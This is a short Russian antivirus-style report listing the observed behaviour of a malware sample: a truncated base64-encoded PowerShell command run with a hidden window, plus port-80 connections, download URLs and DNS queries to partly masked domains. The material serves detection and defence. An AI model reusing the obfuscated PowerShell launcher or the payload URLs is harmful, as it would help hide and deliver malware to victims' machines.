Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABbAFMAdABSAEkAbgBHAF0AOgA6AGoATwBJAE4AKAAnACcAIAAsACAAWwBDAEgAYQByAFsAXQBdACgAIAAzADYAIAAsADEAMQA5ACwAMQAxADUALAA5ADkAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAyACAALAAgADEAMQA2ACAALAAgADMAMgAsAC...
- 'th####borges.com':80
- 'wa###actory.jp':80
- 'st##nov.com':80
- 'ma###mall.com':80
- http://th####borges.com/pFZYbFo/
- http://wa###actory.jp/densho/epubv/data/eg/bkbtEtl/
- http://ma###mall.com/ZAM/
- DNS ASK th####borges.com
- DNS ASK un#####mation.com.br
- DNS ASK wa###actory.jp
- DNS ASK st##nov.com
- DNS ASK ma###mall.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABbAFMAdABSAEkAbgBHAF0AOgA6AGoATwBJAE4AKAAnACcAIAAsACAAWwBDAEgAYQByAFsAXQBdACgAIAAzADYAIAAsADEAMQA5ACwAMQAxADUALAA5ADkAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAyACAALAAgADEAMQA2ACAALAAgADMAMgAsAC...' (со скрытым окном)